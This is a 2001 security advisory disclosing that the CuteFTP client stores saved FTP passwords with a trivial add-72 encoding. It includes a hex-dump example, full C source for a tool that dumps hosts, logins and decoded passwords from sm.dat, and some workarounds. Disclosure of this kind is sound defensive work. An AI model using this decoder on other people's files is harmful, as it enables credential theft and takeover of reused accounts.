scx-sa-21.txt

`  
============================================================================  
Securax-SA-21 Security Advisory  
belgian.networking.security Dutch  
============================================================================  
Topic: CuteFTP uses a weak password encoding scheme  
Announced: 2001-08-01  
Affects: CuteFTP 4.2.4 and below. (but not to low)  
============================================================================  
  
Note: If you happen to find more information, solutions, ... about the below  
problem or further varients please contact me on the following email  
[email protected], or you can contact the Securax crew by e-mail at  
[email protected].  
  
I. Problem Description  
-----------------------  
  
Globalscape's CuteFTP is a popular FTP client. It is used to connect to   
remote ftp servers. CuteFTP has a kinda "Address book" which stores info on  
several FTP servers, such as hostname, login & password (basically the stuff  
you need to log in.. :)).  
  
In any case, CuteFTP uses a very weak encryption scheme, it adds 72 (hex 48)   
to the plaintext password. So , Globalscape uses a kinda ROT-72 encryption  
scheme   
  
Let's get down and dirty, technical that is.. How are the passwords stored?  
Well, they are stored in a file called "sm.dat". I'll give you an example:   
  
This is a part of the hex dump of my sm.dat:  
  
08 31 30 2E 30 2E 30 2E 33 05 41 64 6D 6D 69 05 BC AD BB BB A9  
^ ^ ^  
| - hostname (10.0.0.3) - | - login - | - encoded pw -  
| | |  
|___ len(hostname) |__ len(login) |__ len(password)  
  
The password is BC AD BB BB A9, but if you substract each character by 48,  
you'll see: 74 65 73 73 61, which is "tessa".  
  
So you probably can see, there is a user "Admin" , with a password ("tessa")  
on box 10.0.0.3.  
  
Cute(ftp) isn't it?  
  
  
II. Impact  
----------  
  
No, you won't be able to r3wt th3 pl4n3t with this, But it gave me access to  
several other accounts, because ftp and shell passwords are often the same.  
  
But instead of letting you calculate the password.. here's the code:  
  
--| BOF: cuteftpd.c |--   
  
/*   
  
CuteFTPd: a CUTE Fucking Too easy Password Decrypter  
----------------------------------------------------  
  
This code was made on a hot and sunny afternoon, (as we got many of em in  
belgium). So, don't shoot me if some things won't work. I've found some   
problems when your login is 11 (0x0A) of 13 (0x0D) chars long... but what   
the hell.. fix it.  
  
This program is dedicated to Peter "DC" De Coninck, a good friend of mine  
who passed away in April. DC, I miss you, thank you for everything, take   
care man.  
  
All my love to Tessa, I love you forever, always, every day of my life,   
please marry me. I love you, i need you. please, be mine forever.  
  
Respect to all the great ppl at #[email protected]: U know who i mean,   
and who i don't mean. grmBL. ;)  
  
To Reggie: happy birthday!! =)  
  
Take care,  
incubus <[email protected]>  
  
ps: this code sucks, i know.  
  
*/   
  
  
#include <ctype.h>  
#include <string.h>  
#include <stdio.h>  
#define banner "\n-] CuteFTP password retrieval tool\n -------------------------------\n\n"  
#define usage " usage: %s <path_to_sm.dat>\n\n"  
  
int main(int argc, char **argv)  
{  
FILE *list; unsigned char c, p, t;  
unsigned char host[128], un[128], ep[128], dp[128];  
int i = 0;  
  
printf (banner);   
if (argc < 2){ printf(usage,argv[0]); exit(1); }  
if ((list = fopen(argv[1],"rb")) == NULL){   
perror("error opening file"); exit(1); }  
  
while (!feof(list)){   
c = fgetc(list);  
if (c < 48){  
i++; p = fgetc(list);  
if ((islower(p))||(isupper(p))||(isdigit(p))){  
host[0] = p;  
for (i=1; i<c; i++){  
t = fgetc(list); if (t != 13)   
if (!((t < 48) &&   
(!isspace(t)) &&   
(t!='.') && (t!='-') &&   
(t!='_'))) host[i] = t;  
} i = 0;  
if (strchr(host, '.')){  
printf ("-] %s\n---] login:", host);  
i = strlen(host); p = fgetc(list);  
if (p == 0) printf ("anonymous\n\n");  
else{  
memset(un, 0x0, 128); un[0] = p;  
for (i=0;i<p;i++){  
t = fgetc(list);  
un[i+1] = t;  
}  
printf ("%s\n password: ", un);  
p = fgetc(list); memset(ep, 0x0, 128); memset(dp, 0x0, 128);  
for (i=0;i<p;i++){ t = fgetc(list); ep[i] = t; }  
for (i=0;i<128 ;i++){ if (ep[i] != 0x0){  
dp[i] = ep[i] - 72; printf ("%c", dp[i]);   
} }  
printf ("\n hex: ");  
for (i=0;i<128 ;i++)   
if (dp[i] != 0x0) printf("0x%2x ", dp[i]);  
printf ("\n\n");   
}  
}  
}  
}  
memset(host, 0x0, 128);  
}  
putchar(10);  
exit(123);  
}  
  
--| EOF |--   
  
  
III. workarounds  
----------------  
  
There's this nasty option which allows you to encrypt your sm.dat file, but  
let's take a look at that and see where and how that password is stored.. =)  
  
Other workarounds: don't save passwords in cuteftp, but remember 'em, or use  
another ftp client, OS, ...  
  
  
IV credits  
----------  
Alls my love to Tessa.  
Respect: f0bic, F_F, r-dude, t-omicr0n, tosh, senti, zym0, vor, cic, primus,  
virtual, necro, ares, ... and so on, you know who you are.  
  
take care,  
  
-- incubus ([email protected]).  
  
============================================================================  
For more information [email protected]  
Website http://www.securax.org  
Advisories/Text http://www.securax.org/pers  
----------------------------------------------------------------------------  
  
`